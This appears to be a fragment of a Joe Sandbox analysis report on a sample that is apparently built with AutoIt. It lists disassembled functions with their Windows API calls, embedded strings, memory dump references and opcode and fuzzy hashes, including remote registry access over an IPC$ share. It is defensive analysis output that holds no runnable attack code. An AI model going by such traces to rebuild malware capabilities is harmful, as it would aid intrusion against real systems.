                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-3080491070
                                                        • Opcode ID: ad0a10ff05bcb55800c11f9b07b19bac523e3a8bdf75b424fd362561d3a038ae
                                                        • Instruction ID: 347fd93e77a5840e5945f028cf2b91ab10a76e244a77fb9845af3f0d6c128df9
                                                        • Opcode Fuzzy Hash: ad0a10ff05bcb55800c11f9b07b19bac523e3a8bdf75b424fd362561d3a038ae
                                                        • Instruction Fuzzy Hash: D951803194051AAACF14EBE4DD46EEEBB79EF14300F604069F509721A2EB312F99DF61
                                                        Function 0012A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0012A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0012A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0012A4C5
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: d7a51478c6bcb7d6e8ceea6b15a621c7d4491ea01f770be511f5c6866151f57f
                                                        • Instruction ID: 60816e9971425ee9b51e38d150d4093b3310c088df29a764f569634daa689147
                                                        • Opcode Fuzzy Hash: d7a51478c6bcb7d6e8ceea6b15a621c7d4491ea01f770be511f5c6866151f57f
                                                        • Instruction Fuzzy Hash: E1514B751042059FC700EF10C885EAEB3F4EF98718F44886DF88A57262DB71ED4ACB52
                                                        Function 0011F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,000FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0011F8DF
                                                        • LoadStringW.USER32(00000000,?,000FE029,00000001), ref: 0011F8E8
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • GetModuleHandleW.KERNEL32(00000000,00185310,?,00000FFF,?,?,000FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0011F90A
                                                        • LoadStringW.USER32(00000000,?,000FE029,00000001), ref: 0011F90D
                                                        • __swprintf.LIBCMT ref: 0011F95D
                                                        • __swprintf.LIBCMT ref: 0011F96E
                                                        • _wprintf.LIBCMT ref: 0011FA17
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0011FA2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: 990b13ebd28d2bcbd8626ee44236e06969162c81fa14ea1301022cb59304bfd3
                                                        • Instruction ID: 629f0db76d5e699a144216ef1a329346f0abd8dcb28e4fa128d8442cae3acf7a
                                                        • Opcode Fuzzy Hash: 990b13ebd28d2bcbd8626ee44236e06969162c81fa14ea1301022cb59304bfd3
                                                        • Instruction Fuzzy Hash: 4C412E7280411DAACB14FBE0DD86EEEB778AF58311F500069B509760A3EB356F4ACF61
                                                        Function 0014BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00149207,?,?), ref: 0014BA56
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA6D
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA78
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA85
                                                        • GlobalLock.KERNEL32(00000000), ref: 0014BA8E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BA9D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0014BAA6
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BAAD
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00149207,?,?,00000000,?), ref: 0014BABE
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00152CAC,?), ref: 0014BAD7
                                                        • GlobalFree.KERNEL32(00000000), ref: 0014BAE7
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0014BB0B
                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0014BB36
                                                        • DeleteObject.GDI32(00000000), ref: 0014BB5E
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0014BB74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: 233f5706b5d6ee6db5d790e6a898e579a3751b6c2ad878c7eba37ec33675c9ee
                                                        • Instruction ID: 76501f9172157f424088535efd43589b19dc068258f1f1a64399dc922ba1dc25
                                                        • Opcode Fuzzy Hash: 233f5706b5d6ee6db5d790e6a898e579a3751b6c2ad878c7eba37ec33675c9ee
                                                        • Instruction Fuzzy Hash: 8D411879600208EFDB119F65DC88EABBBB9FB8AB11F104068F909D7270D7709D42DB60
                                                        Function 0012D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 0012DA10
                                                        • _wcscat.LIBCMT ref: 0012DA28
                                                        • _wcscat.LIBCMT ref: 0012DA3A
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0012DA4F
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DA63
                                                        • GetFileAttributesW.KERNEL32(?), ref: 0012DA7B
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0012DA95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0012DAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                        • String ID: *.*
                                                        • API String ID: 34673085-438819550
                                                        • Opcode ID: ff042031ae890de2ac4a0cdd03b0058f5b75c930de618f2b6d56fd72d4dbe500
                                                        • Instruction ID: bbb7296c6bc1d9124e7f99185d56fcf4627071f6c57ed44c5a6d6d806668cb9f
                                                        • Opcode Fuzzy Hash: ff042031ae890de2ac4a0cdd03b0058f5b75c930de618f2b6d56fd72d4dbe500
                                                        • Instruction Fuzzy Hash: 6E81A1715083519FCB24DF64E845AAEB7E8BF89314F14882EF889C7251EB30DD95CB52
                                                        Function 0014C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C2612: GetWindowLongW.USER32(?,000000EB), ref: 000C2623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0014C1FC
                                                        • GetFocus.USER32 ref: 0014C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0014C217
                                                        • _memset.LIBCMT ref: 0014C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0014C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0014C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0014C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0014C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0014C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0014C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0014C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 2147d2928d64375198b1edc90886e3e573df04279fc33dadf26682bb452188d2
                                                        • Instruction ID: 5abf2dd39ee133f119fc37c66cf1aea6eebac5950545d04c4df4294f8006c1fa
                                                        • Opcode Fuzzy Hash: 2147d2928d64375198b1edc90886e3e573df04279fc33dadf26682bb452188d2
                                                        • Instruction Fuzzy Hash: 1F81BE7020A3019FD750CF14C994EBBBBE9FB88714F04492EFA95972A1D770D941CBA2
                                                        Function 0013731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0013738F
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0013739B
                                                        • CreateCompatibleDC.GDI32(?), ref: 001373A7
                                                        • SelectObject.GDI32(00000000,?), ref: 001373B4
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00137408
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00137444
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00137468
                                                        • SelectObject.GDI32(00000006,?), ref: 00137470
                                                        • DeleteObject.GDI32(?), ref: 00137479
                                                        • DeleteDC.GDI32(00000006), ref: 00137480
                                                        • ReleaseDC.USER32(00000000,?), ref: 0013748B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 24a2cfecb1c7b8b0c3524c42587db9183f4d464a65a1eeb5ca082e89b5b010d4
                                                        • Instruction ID: fae10940f6598943df7175aa8d9403f45cef45079ac0464c93a02d3e0237cc1a
                                                        • Opcode Fuzzy Hash: 24a2cfecb1c7b8b0c3524c42587db9183f4d464a65a1eeb5ca082e89b5b010d4
                                                        • Instruction Fuzzy Hash: 095139B5904209EFCB24CFA9CC85EAEBBB9FF49310F14842DF959A7361C771A9418B50
                                                        Function 000C6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000E0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,000C6B0C,?,00008000), ref: 000E0973
                                                          • Part of subcall function 000C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C4743,?,?,000C37AE,?), ref: 000C4770
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C6BAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 000C6CFA
                                                          • Part of subcall function 000C586D: _wcscpy.LIBCMT ref: 000C58A5
                                                          • Part of subcall function 000E363D: _iswctype.LIBCMT ref: 000E3645
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: 9d9b4fab77f4d723410c423b34899eee9980a8cedd492cfa31b70a7d03777fe7
                                                        • Instruction ID: f16bca147933fcfd41ec7d1ba286555b8b0016032eb94d10e6f5892258a18d5c
                                                        • Opcode Fuzzy Hash: 9d9b4fab77f4d723410c423b34899eee9980a8cedd492cfa31b70a7d03777fe7
                                                        • Instruction Fuzzy Hash: 1A029C301083449FC724EF24C881EAFBBE5EF95354F14492DF58A972A2DB31E989DB52
                                                        Function 00122D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122D50
                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00122DDD
                                                        • GetMenuItemCount.USER32(00185890), ref: 00122E66
                                                        • DeleteMenu.USER32(00185890,00000005,00000000,000000F5,?,?), ref: 00122EF6
                                                        • DeleteMenu.USER32(00185890,00000004,00000000), ref: 00122EFE
                                                        • DeleteMenu.USER32(00185890,00000006,00000000), ref: 00122F06
                                                        • DeleteMenu.USER32(00185890,00000003,00000000), ref: 00122F0E
                                                        • GetMenuItemCount.USER32(00185890), ref: 00122F16
                                                        • SetMenuItemInfoW.USER32(00185890,00000004,00000000,00000030), ref: 00122F4C
                                                        • GetCursorPos.USER32(?), ref: 00122F56
                                                        • SetForegroundWindow.USER32(00000000), ref: 00122F5F
                                                        • TrackPopupMenuEx.USER32(00185890,00000000,?,00000000,00000000,00000000), ref: 00122F72
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00122F7E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 3993528054-0
                                                        • Opcode ID: c5adf12a7e291c6b16d00418bde1da5c0b37dd410fe1fa6ca922d9c839caf4f4
                                                        • Instruction ID: e4186c3691aaafaba02df5debfc305f1eb70a1605a092c486f5256e08c95ee5a
                                                        • Opcode Fuzzy Hash: c5adf12a7e291c6b16d00418bde1da5c0b37dd410fe1fa6ca922d9c839caf4f4
                                                        • Instruction Fuzzy Hash: 5071C270600229BEEB258F54EC45FAEBF65FF05324F24421AF625AA1E1C7B15C70DB91
                                                        Function 001177DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • _memset.LIBCMT ref: 0011786B
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001178A0
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001178BC
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001178D8
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00117902
                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0011792A
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00117935
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0011793A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 1411258926-22481851
                                                        • Opcode ID: dc649a65ff872c7a2d84a5e206439c9c9f323cf1318f24ecf408b20962b86c95
                                                        • Instruction ID: 3e0d3968e16a4475cf33f3660c603e2ea1aa5575054062012fe3157477430edd
                                                        • Opcode Fuzzy Hash: dc649a65ff872c7a2d84a5e206439c9c9f323cf1318f24ecf408b20962b86c95
                                                        • Instruction Fuzzy Hash: 3641D57681422DAACB15EBA4DC85EEEB778FF54310F404069F905A72A2EB315E45CF90
                                                        Function 00140E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: 3c5fd4845fbe030b476459c24dd5930755e325a032d3456d1112e428e2fd5554
                                                        • Instruction ID: 01ea4644d2e521b5217065a7441971f039550007bdafab0286bc6c89b90ab0e4
                                                        • Opcode Fuzzy Hash: 3c5fd4845fbe030b476459c24dd5930755e325a032d3456d1112e428e2fd5554
                                                        • Instruction Fuzzy Hash: AA416C3210025A8FCF11EF11DA55AEE3770AF19300F594464FD5A2B2A2DB709D9FCBA1
                                                        Function 0011F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000FE2A0,00000010,?,Bad directive syntax error,0014F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0011F7C2
                                                        • LoadStringW.USER32(00000000,?,000FE2A0,00000010), ref: 0011F7C9
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                        • _wprintf.LIBCMT ref: 0011F7FC
                                                        • __swprintf.LIBCMT ref: 0011F81E
                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0011F88D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                        • API String ID: 1506413516-4153970271
                                                        • Opcode ID: 6b59b714d939457b377568d2466521dbad4c28d4e8fa4563754eaa1163c97b29
                                                        • Instruction ID: 76e8014b80346abd719d1937b6e714b41ca211ae48fee724d602947fc89069c4
                                                        • Opcode Fuzzy Hash: 6b59b714d939457b377568d2466521dbad4c28d4e8fa4563754eaa1163c97b29
                                                        • Instruction Fuzzy Hash: 6021593294021EAFCF15EFA0CC4AFEE7739BF28310F04446DB509661A2EB71A659DB50
                                                        Function 001252C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                          • Part of subcall function 000C7924: _memmove.LIBCMT ref: 000C79AD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00125330
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00125346
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00125357
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00125369
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0012537A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
